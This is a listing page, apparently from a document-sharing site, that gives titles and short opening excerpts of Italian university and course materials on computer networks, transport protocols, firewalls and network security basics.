Prova completa - Rete Internet (ing. Giovanni Neglia) Lunedì 25 Giugno 2007 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome: Corso di laurea
DettagliElementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it
Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing Chiara Braghin chiara.braghin@unimi.it Sniffing (1) Attività di intercettazione passiva dei dati che transitano in una rete telematica, per:
DettagliProtocolli ARP e RARP
Frammentazione Protocolli ARP e RARP Tipi di rete (dati 2000) Estensione Banda (Mbps) Latenza (ms) LAN 1-2 km 10-1000 1-10 WAN worldwide 0.010-600 100-500 MAN 2-50 km 1-150 10 Wireless LAN 0.15-1.5 km
DettagliAnalizziamo quindi in dettaglio il packet filtering
Packet filtering Diamo per noti I seguenti concetti: Cosa e un firewall Come funziona un firewall (packet filtering, proxy services) Le diverse architetture firewall Cosa e una politica di sicurezza Politica
DettagliIl firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall
Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole
DettagliTCP. Servizio di Trasporto Affidabile. Transmission Control Protocol. Caratteristiche di TCP 1
TCP a.a. 2002/03 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Servizio di Trasporto Affidabile Il livello di trasporto deve fornire un servizio di consegna orientato alla
DettagliLivello di trasporto: meccanismi trasferimento dati affidabile, TCP
Livello di trasporto: meccanismi trasferimento dati affidabile, TCP Gaia Maselli Queste slide sono un adattamento delle slide fornite dal libro di testo e pertanto protette da copyright. - Copyright 2013
DettagliMODELLI ISO/OSI e TCP/IP
PARTE I - Reti di Calcolatori ed Internet MODELLI ISO/OSI e TCP/IP 2.1 Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto tra OSI e TCP/IP ARPANET Ethernet Reti ATM reti
DettagliTCP/IP: elemento unificante
TCP/IP: elemento unificante L elemento unificante di Internet è la suite di protocolli TCP/IP (non solo TCP e IP!) per la trasmissione dei dati Non sono elementi unificanti di Internet: tecnologia di accesso
DettagliAtlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: MultiNAT e One-to-One NAT Language: Italiano
Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: MultiNAT e One-to-One NAT Language: Italiano MULTINAT INTRODUZIONE Grazie a questa funzionalità è possibile
DettagliLivello di Trasporto
Livello di Trasporto Introduzione Problemi e requisiti Livello di trasporto in Internet UDP -UserDatagramProtocol TCP - Transmission Control Protocol Meccanismo di ritrasmissione Controllo del flusso Three-way
DettagliCorso di avvicinamento al Software Libero. Lunedi 23 Gennaio
Corso di avvicinamento al Software Libero Lunedi 23 Gennaio Parte 1 GNU/Linux Caratteristiche compatibile con UNIX multitasking multiutente libero GNU/Linux Multitasking la capacita' di mandare in esecuzione
DettagliCorso di Sicurezza nelle reti a.a. 2009/2010. Soluzioni dei quesiti sulla seconda parte del corso
Università degli Studi di Parma - Facoltà di Ingegneria Corso di Sicurezza nelle reti a.a. 2009/2010 Soluzioni dei quesiti sulla seconda parte del corso 1) Si consideri lo schema di rete rappresentato
DettagliLaboratorio Wireshark: ICMP
Laboratorio Wireshark: ICMP Versione 2.1 italiano 2007 J.F. Kurose, K. W. Ross. All rights reserved. Traduzione italiana di G. Amato, 2011. Modifiche e adattamenti per il CLEII di G. Amato, 2011. In questo
DettagliMODELLI ISO/OSI e TCP/IP
PARTE I - Reti di Calcolatori ed Internet MODELLI ISO/OSI e TCP/IP Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto tra OSI e TCP/IP ARPANET Ethernet Reti ATM reti wireless
DettagliIP Spoofing in Scioltezza
IP Spoofing in Scioltezza Autore: ORK Data Pubblicazione: Aprile 2001 Versione Documento: 1.0 Originariamente questo articolo è stato scritto per essere pubblicato sulla pagina del LUG di Gorizia (GOLUG).
DettagliI Firewall. Metodi e strumenti per la Sicurezza informatica. Claudio Telmon claudio@di.unipi.it
I Firewall Metodi e strumenti per la Sicurezza informatica Claudio Telmon claudio@di.unipi.it Cos è un firewall Un firewall è un sistema, nel senso più ampio del termine, che ha lo scopo di controllare
DettagliSicurezza nelle reti: protezione di LAN
Sicurezza nelle reti: protezione di LAN Gaia Maselli maselli@di.uniroma1.it Queste slide sono un adattamento delle slide fornite dal libro di testo e pertanto protette da copyright. All material copyright
Dettagli4 - Il livello di trasporto
Università di Bergamo Dipartimento di Ingegneria Gestionale e dell Informazione 4 - Il livello di trasporto Architetture e Protocolli per Internet Servizio di trasporto il livello di trasporto ha il compito
Dettaglivulnerabilità delle reti 2006-2009 maurizio pizzonia sicurezza dei sistemi informatici e delle reti
vulnerabilità delle reti 1 reti e protocolli vulnerabili gran parte delle vulnerabilità delle reti sono in realtà vulnerabilità dei protocolli inserire la sicurezza in un protocollo significa costringere
DettagliIntroduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.
Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza
DettagliUDP. User Datagram Protocol. UDP Connectionless
UDP User Datagram Protocol IP fornisce un unreliable datagram service tra gli host I Transport protocols forniscono un servizio di consegna end-to-end tra gli endpoints di una connessione UDP Connectionless
DettagliEsercitazione. Livello di Trasporto [Capitolo 3]
Esercitazione Livello di Trasporto [Capitolo 3] 1 È possibile che un'applicazione che gira su UDP ottenga un trasferimento dati affidabile? Si. Lo sviluppatore dell'applicazione può inserire il trasferimento
DettagliProva in itinere - Rete Internet (ing. Giovanni Neglia) Mercoledì 23 Maggio 2007, ore 15.00
Prova in itinere - Rete Internet (ing. Giovanni Neglia) Mercoledì 23 Maggio 2007, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome:
DettagliNetwork Troubleshooting
Network Troubleshooting Introduzione e concetti base di Giovanni Perteghella [Digital Lab] Webb.it 2004 - Padova 1 Copyright Questo insieme di trasparenze è protetto dalle leggi sul copyright e dalle disposizioni
Dettagli